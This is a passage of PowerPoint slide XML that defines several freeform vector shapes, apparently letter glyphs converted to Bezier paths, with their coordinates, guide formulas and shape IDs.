                  <a:cubicBezTo>
                    <a:pt x="109" y="31"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="108" y="218"/>
                    <a:pt x="115" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="162" y="188"/>
                    <a:pt x="144" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="195" y="218"/>
                    <a:pt x="202" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="218"/>
                    <a:pt x="260" y="218"/>
                    <a:pt x="260" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="152" y="7"/>
                    <a:pt x="138" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="0"/>
                    <a:pt x="69" y="7"/>
                    <a:pt x="57" y="1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19" name="Freeform 110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A13B3BD-4B50-4817-8B89-D5939DD86E95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2054225" y="982663"/>
              <a:ext cx="77788" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 105 h 222"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 119 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="133" y="192"/>
                    <a:pt x="119" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="57"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="108" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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0" name="Freeform 111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E47FE7-486E-4433-B49D-D08876014374}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2151062" y="985838"/>
              <a:ext cx="87313" cy="44450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 224"/>
                <a:gd name="T1" fmla="*/ 35 h 111"/>
                <a:gd name="T2" fmla="*/ 224 w 224"/>
                <a:gd name="T3" fmla="*/ 18 h 111"/>
                <a:gd name="T4" fmla="*/ 198 w 224"/>
                <a:gd name="T5" fmla="*/ 0 h 111"/>
                <a:gd name="T6" fmla="*/ 26 w 224"/>
                <a:gd name="T7" fmla="*/ 0 h 111"/>
                <a:gd name="T8" fmla="*/ 0 w 224"/>
                <a:gd name="T9" fmla="*/ 18 h 111"/>
                <a:gd name="T10" fmla="*/ 23 w 224"/>
                <a:gd name="T11" fmla="*/ 35 h 111"/>
                <a:gd name="T12" fmla="*/ 201 w 224"/>
                <a:gd name="T13" fmla="*/ 35 h 111"/>
                <a:gd name="T14" fmla="*/ 198 w 224"/>
                <a:gd name="T15" fmla="*/ 111 h 111"/>
                <a:gd name="T16" fmla="*/ 224 w 224"/>
                <a:gd name="T17" fmla="*/ 93 h 111"/>
                <a:gd name="T18" fmla="*/ 201 w 224"/>
                <a:gd name="T19" fmla="*/ 76 h 111"/>
                <a:gd name="T20" fmla="*/ 23 w 224"/>
                <a:gd name="T21" fmla="*/ 76 h 111"/>
                <a:gd name="T22" fmla="*/ 0 w 224"/>
                <a:gd name="T23" fmla="*/ 93 h 111"/>
                <a:gd name="T24" fmla="*/ 26 w 224"/>
                <a:gd name="T25" fmla="*/ 111 h 111"/>
                <a:gd name="T26" fmla="*/ 198 w 224"/>
                <a:gd name="T2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4" h="111">
                  <a:moveTo>
                    <a:pt x="201" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="35"/>
                    <a:pt x="224" y="35"/>
                    <a:pt x="224" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="0"/>
                    <a:pt x="205" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="17" y="35"/>
                    <a:pt x="23" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="111"/>
                    <a:pt x="224" y="111"/>
                    <a:pt x="224" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="76"/>
                    <a:pt x="207" y="76"/>
                    <a:pt x="201" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="76"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="111"/>
                    <a:pt x="19" y="111"/>
                    <a:pt x="26" y="111"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="11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1" name="Freeform 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565AB7A9-0DC9-45C4-A8EB-FA957BFD2D25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2255837" y="946150"/>
              <a:ext cx="79375" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 122 w 209"/>
                <a:gd name="T1" fmla="*/ 173 h 316"/>
                <a:gd name="T2" fmla="*/ 177 w 209"/>
                <a:gd name="T3" fmla="*/ 230 h 316"/>
                <a:gd name="T4" fmla="*/ 116 w 209"/>
                <a:gd name="T5" fmla="*/ 285 h 316"/>
                <a:gd name="T6" fmla="*/ 58 w 209"/>
                <a:gd name="T7" fmla="*/ 270 h 316"/>
                <a:gd name="T8" fmla="*/ 34 w 209"/>
                <a:gd name="T9" fmla="*/ 226 h 316"/>
                <a:gd name="T10" fmla="*/ 17 w 209"/>
                <a:gd name="T11" fmla="*/ 209 h 316"/>
                <a:gd name="T12" fmla="*/ 0 w 209"/>
                <a:gd name="T13" fmla="*/ 229 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 209"/>
                <a:gd name="T15" fmla="*/ 295 h 316"/>
                <a:gd name="T16" fmla="*/ 15 w 209"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 33 w 209"/>
                <a:gd name="T19" fmla="*/ 293 h 316"/>
                <a:gd name="T20" fmla="*/ 116 w 209"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 209 w 209"/>
                <a:gd name="T23" fmla="*/ 227 h 316"/>
                <a:gd name="T24" fmla="*/ 185 w 209"/>
                <a:gd name="T25" fmla="*/ 168 h 316"/>
                <a:gd name="T26" fmla="*/ 113 w 209"/>
                <a:gd name="T27" fmla="*/ 136 h 316"/>
                <a:gd name="T28" fmla="*/ 72 w 209"/>
                <a:gd name="T29" fmla="*/ 127 h 316"/>
                <a:gd name="T30" fmla="*/ 32 w 209"/>
                <a:gd name="T31" fmla="*/ 80 h 316"/>
                <a:gd name="T32" fmla="*/ 92 w 209"/>
                <a:gd name="T33" fmla="*/ 30 h 316"/>
                <a:gd name="T34" fmla="*/ 162 w 209"/>
                <a:gd name="T35" fmla="*/ 93 h 316"/>
                <a:gd name="T36" fmla="*/ 178 w 209"/>
                <a:gd name="T37" fmla="*/ 107 h 316"/>
                <a:gd name="T38" fmla="*/ 196 w 209"/>
                <a:gd name="T39" fmla="*/ 86 h 316"/>
                <a:gd name="T40" fmla="*/ 196 w 209"/>
                <a:gd name="T41" fmla="*/ 20 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 209"/>
                <a:gd name="T43" fmla="*/ 0 h 316"/>
                <a:gd name="T44" fmla="*/ 163 w 209"/>
                <a:gd name="T45" fmla="*/ 23 h 316"/>
                <a:gd name="T46" fmla="*/ 93 w 209"/>
                <a:gd name="T47" fmla="*/ 0 h 316"/>
                <a:gd name="T48" fmla="*/ 0 w 209"/>
                <a:gd name="T49" fmla="*/ 82 h 316"/>
                <a:gd name="T50" fmla="*/ 64 w 209"/>
                <a:gd name="T51" fmla="*/ 160 h 316"/>
                <a:gd name="T52" fmla="*/ 122 w 209"/>
                <a:gd name="T53" fmla="*/ 17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9" h="316">
                  <a:moveTo>
                    <a:pt x="122" y="173"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="176"/>
                    <a:pt x="177" y="186"/>
                    <a:pt x="177" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="256"/>
                    <a:pt x="156" y="285"/>
                    <a:pt x="116" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="285"/>
                    <a:pt x="78" y="283"/>
                    <a:pt x="58" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="256"/>
                    <a:pt x="35" y="235"/>
                    <a:pt x="34" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="218"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="17" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="219"/>
                    <a:pt x="0" y="229"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="295"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="303"/>
                    <a:pt x="0" y="316"/>
                    <a:pt x="15" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="316"/>
                    <a:pt x="29" y="309"/>
                    <a:pt x="33" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="308"/>
                    <a:pt x="84" y="316"/>
                    <a:pt x="116" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="316"/>
                    <a:pt x="209" y="272"/>
                    <a:pt x="209" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="195"/>
                    <a:pt x="191" y="174"/>
                    <a:pt x="185" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="148"/>
                    <a:pt x="152" y="144"/>
                    <a:pt x="113" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="121"/>
                    <a:pt x="32" y="103"/>
                    <a:pt x="32" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="54"/>
                    <a:pt x="57" y="30"/>
                    <a:pt x="92" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="30"/>
                    <a:pt x="159" y="77"/>
                    <a:pt x="162" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="104"/>
                    <a:pt x="168" y="107"/>
                    <a:pt x="178" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="107"/>
                    <a:pt x="196" y="96"/>
                    <a:pt x="196" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="196" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="12"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="0"/>
                    <a:pt x="166" y="8"/>
                    <a:pt x="163" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="6"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="93" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="0"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="115"/>
                    <a:pt x="23" y="148"/>
                    <a:pt x="64" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="160"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="122" y="17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2" name="Freeform 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66CF9BB-5131-4444-B323-3AE22BCA2773}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2355850" y="982663"/>
              <a:ext cx="90488" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 110 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 1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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="23" y="59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="82"/>
                    <a:pt x="0" y="107"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="77" y="112"/>
                    <a:pt x="150" y="11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3" name="Freeform 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4210ECA4-AA93-4E6F-80FB-88FCD9936AD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2446337" y="982663"/>
              <a:ext cx="100013" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
